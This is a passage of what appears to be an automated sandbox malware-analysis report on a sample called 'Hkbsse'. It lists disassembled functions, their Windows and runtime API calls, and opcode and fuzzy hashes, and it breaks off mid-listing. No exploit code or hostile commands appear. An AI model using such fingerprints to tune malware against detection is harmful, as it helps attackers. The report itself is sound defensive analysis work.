                    • Instruction ID: b1894cb517c06a3f85e37dbbb0dbc8aa4abe9868d7e3a5819c2c87bac6c50229
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 90F0A03560020ABBCF00EFA1DD05EEF376C6B04715F200526B625E50E2DA38EA44A768
                    Function 044A0191 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,044B0D9D,000000FF,0000000C), ref: 044A01A8
                    • GetLastError.KERNEL32(?,044B0D9D,?,00430A36,?,?,?,?,?,?,044A6025,?), ref: 044A01B7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044A01CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: efe6d98068cd63d8b0239da3acb4106977bec0f8ab8f2d0949c699fdcb4346ac
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 62F0A03550020EFBEF00EFA1DD48EEF77BCAB10709F200516B921E11D1DA35E6149764
                    Function 00402AF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4211761357
                    • Opcode ID: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction ID: 61496bd6a01842805568ee1c9490c26cdbd20980f2f353701ae25422a6d128cf
                    • Opcode Fuzzy Hash: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction Fuzzy Hash: 48F0A770D1020CABC710DF68984159EFBF89F15305F1082AFEC4067301EBB51A58CB99
                    Function 0449D510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 0449D53D
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0449D4AD,00000064,?,0045007C,?,044878C4,00468650), ref: 0449D54E
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 0449D555
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: WF
                    • API String ID: 501323975-2907287748
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: d3321fe3dd9d6782cc2c4a4444b519660d5a260b08ae706f1ddb8767675992b6
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 35E06D39901B24E7CB122B50AC08A8E3F68EB09763F044032F90992160D661AC019BDE
                    Function 00407DA0 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,13877BC0), ref: 00407E1A
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E7B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E82
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F47
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 3e6432cc51bf1a22c5ffd18933b2700fe51af15a19e7b42cd36b110cfa8a3477
                    • Instruction ID: 784d6eb4ad79aa1e17a967bc2ef708f0396776d1d42dc3bf5217fbcf21c48606
                    • Opcode Fuzzy Hash: 3e6432cc51bf1a22c5ffd18933b2700fe51af15a19e7b42cd36b110cfa8a3477
                    • Instruction Fuzzy Hash: 52D10870E00604EBDB14BB28CD4A39E7A71AB81714F5442AEE815773C2DB7D5E848BCB
                    Function 04488007 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 04488081
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044880E2
                    • GetProcAddress.KERNEL32(00000000), ref: 044880E9
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044881AE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction ID: d20d2e3aa35fc41b70e68f3450b6c888297a7b7dc7f6a0374eeda70077240d0f
                    • Opcode Fuzzy Hash: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction Fuzzy Hash: 6ED10970E00254ABEF14BF28CD467AD7B61AB81314F94429ED805673C2EB756E848BD7
                    Function 0043CB90 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction ID: 7e71781bbfdb81641079919ac07b49ba12931590954ee84f1c7785d69e78186a
                    • Opcode Fuzzy Hash: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction Fuzzy Hash: 0FB124329002859FDB15CF28C8C17AEBBE5EF59350F25A16BE845BB341D63C9D02CB69
                    Function 044BCDF7 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction ID: 63426409d4131e69dbfccabeb535000baeaa53be5ef47429066c63200eae9dc0
                    • Opcode Fuzzy Hash: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction Fuzzy Hash: 46B1F671E056459FEF258F29C8C07EEBBA5EF45344F1481AFE895AB341D634A902CBB0
                    Function 0043515F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction ID: b9fc1319993f16ce4fdb72853175d02b605fe766e2192af1e1eb381543aa3c59
                    • Opcode Fuzzy Hash: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction Fuzzy Hash: 2851E072601A06AFDB288F51D841BABB7A4EF48310F14156FEC0147391E739EC51CF98
                    Function 044B53C6 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction ID: 9916ff41c5aa99f9234d634f97c3fc50f5fa28dca3b5cb05d3f2608b92aad65e
                    • Opcode Fuzzy Hash: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction Fuzzy Hash: A0519E71600326BFEF288F15D941BFAB7A4EF0471AF14452EE88686691E731B851DBF0
                    Function 00408350 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,13877BC0), ref: 004083C9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408430
                    • GetProcAddress.KERNEL32(00000000), ref: 00408437
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: dbcfdf89b10de56a2523a8733c535b78a2233f72f19177a036005012acc1e325
                    • Instruction ID: 2669896dabc0e4ffefeed8579a88ac15b202beb4dd7596f0f9752e6226651e62
                    • Opcode Fuzzy Hash: dbcfdf89b10de56a2523a8733c535b78a2233f72f19177a036005012acc1e325
                    • Instruction Fuzzy Hash: C0510870900208ABDB14EF64DE497DEBB74EB45314F5042BEE855A72C2EF399AC08B59
                    Function 044885B7 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 04488630
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04488697
                    • GetProcAddress.KERNEL32(00000000), ref: 0448869E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction ID: 2a6d3b1fe0785e98e2e429a4eb866bdb4542678c2f7796f8a7ed7099813e9bae
                    • Opcode Fuzzy Hash: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction Fuzzy Hash: 79511771D00208ABEF24FF25CD497DDBB75EB45310F9046AEE805A72C1EB35AA808B95
                    Function 00434D25 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 79a7c196a4a87a90b7f5eed02673632fb3c179273ff44878c0118b676a9e0162
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 725188359042099FDF10CFA8C4826EFBBF5FF99324F24549AE850A7351D33AA945CB94
                    Function 0044606E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0044613E
                    • _free.LIBCMT ref: 00446167
                    • SetEndOfFile.KERNEL32(00000000,00441AAA,00000000,0043AD32,?,?,?,?,?,?,?,00441AAA,0043AD32,00000000), ref: 00446199
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00441AAA,0043AD32,00000000,?,?,?,?,00000000), ref: 004461B5
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 2d08f1c89283f971e2dbc99742b5c5d2ec6674a103a1ef792aed1683b5bdd9d4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: A84107729006009AEB11AFBA8C46B8E3775AF4A364F16151BF914A7292D63CC840476A
                    Function 00402E80 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00402F1F
                    • GetCurrentThreadId.KERNEL32 ref: 00402F3E
                    • __Mtx_unlock.LIBCPMT ref: 00402F8C
                    • __Cnd_broadcast.LIBCPMT ref: 00402FA3
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
                    • String ID:
                    • API String ID: 3471820992-0
                    • Opcode ID: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction ID: e825d9dc3a901559c5738fae14c527551fe8a17dfb067f9c5c2eb0eb023bb9bf
                    • Opcode Fuzzy Hash: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction Fuzzy Hash: 0241DFB09002069BCB20DB65CA45B9AB7F8FF14354F10453EE816E77C0EB78E900DB85
                    Function 044830E7 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction ID: d6b3a1ab5e5d11c2bef6ace4f7ff5923ae7d1f13d87393b1610c795640035b13
                    • Opcode Fuzzy Hash: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction Fuzzy Hash: A641BEB0A01615ABEF21EF65C98475BBBE8EF05724F00452ED815D7751EB35FA00CB81
                    Function 044C62D5 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 044C63A5
                    • _free.LIBCMT ref: 044C63CE
                    • SetEndOfFile.KERNEL32(00000000,044C1D11,00000000,044BAF99,?,?,?,?,?,?,?,044C1D11,044BAF99,00000000), ref: 044C6400
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,044C1D11,044BAF99,00000000,?,?,?,?,00000000), ref: 044C641C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: b7ac0cee9e22b4d83e510ea66830d346220ef01fdfc2ddbc3ab4a2b448e25af4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: 3F41EC7A900A0196EF516FA5CC4169E3765EF84364F1D811FE454A72B1EE34F84287B1
                    Function 00422E0C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 9beed26a825f1ece50d1044237a9d26a4491e3443ab310ceb7be1a93bb172293
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: DF318B75A00319EFCF10DF94DAC0AAE7BB9BF44304F4504AADD01AB346D7B4A944EBA5
                    Function 044A3073 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044A3086
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 00761c298df1126d36ac374e1acc04d61c15a0f4aa9e96340426f89b03067e2d
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: A9315975A00309EFDF10DF95C8C8AAEBBB9BF54315F0404AADD41AB346E730A955DBA0
                    Function 0043D9F2 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043E9C9: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444E60,?,00000000,00000000), ref: 0043EA6B
                    • GetLastError.KERNEL32 ref: 0043DA5A
                    • __dosmaperr.LIBCMT ref: 0043DA61
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043DAA0
                    • __dosmaperr.LIBCMT ref: 0043DAA7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction ID: 3d9dcb479ea73530b4d2aa109c1a6950b544f6a37a2d41994a632baa8fad223f
                    • Opcode Fuzzy Hash: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction Fuzzy Hash: D521C7B1A082057F9B20BF66AD81D6BB7ADEF4C368F10911AF82597241D738EC418798
                    Function 044BDC59 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044B6D43: _free.LIBCMT ref: 044B6D51
                      • Part of subcall function 044BEC30: WideCharToMultiByte.KERNEL32(044889D7,00000000,0045FBB0,00000000,044889D7,044889D7,044C0959,?,0045FBB0,?,00000000,?,044C06C8,0000FDE9,00000000,?), ref: 044BECD2
                    • GetLastError.KERNEL32 ref: 044BDCC1
                    • __dosmaperr.LIBCMT ref: 044BDCC8
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 044BDD07
                    • __dosmaperr.LIBCMT ref: 044BDD0E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction ID: cb16ab5264d50d0b989fe54cdd4dbb98de30d93aac65698f8b3895a6291f6488
                    • Opcode Fuzzy Hash: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction Fuzzy Hash: 0221C9B1A046056FBF215F66DC808E7B7ACEF44268310455AE8E997241E731FC0187F0
                    Function 00430BA9 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON
                    Download Yara Rule
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 00430BFA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430BE2
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430C5D
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 00430C62
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 57bdfcda8ae773349b13e319bab3268c626313179c611564d1a2f16d6c6a901f
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: 52214635700228AFCB14EB59DC45D6EB3BCEF48325F10025BFA15A3392CA74AD018AAD
                    Function 00429DA5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 00429DAC
                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429DF8
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E0E
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E7A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                    • String ID:
                    • API String ID: 2033596534-0
                    • Opcode ID: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction ID: 4e4e7a5eb7143f9fbb3103a1f6126f4c5a38472fe452da36fe41685c322f6648
                    • Opcode Fuzzy Hash: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction Fuzzy Hash: 5A21C771A04124DFDB04EFA5E88299E77B4BF05314F61402FF401AB291DB396D45CB9D
                    Function 044AA00C Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 044AA013
                    • std::bad_exception::bad_exception.LIBCMT ref: 044AA075
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 044AA0B7
                    • std::bad_exception::bad_exception.LIBCMT ref: 044AA0E1
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID:
                    • API String ID: 3836581985-0
                    • Opcode ID: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction ID: 992ffeae27417c188d8c0943b1fb98b755a7204df85ed261575d3102eb21fef0
                    • Opcode Fuzzy Hash: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction Fuzzy Hash: C221AE72904604AFEF05EFA4D88499DB7F4AF24318F10402FE401BB291EB317D16CB55
                    Function 044BB484 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
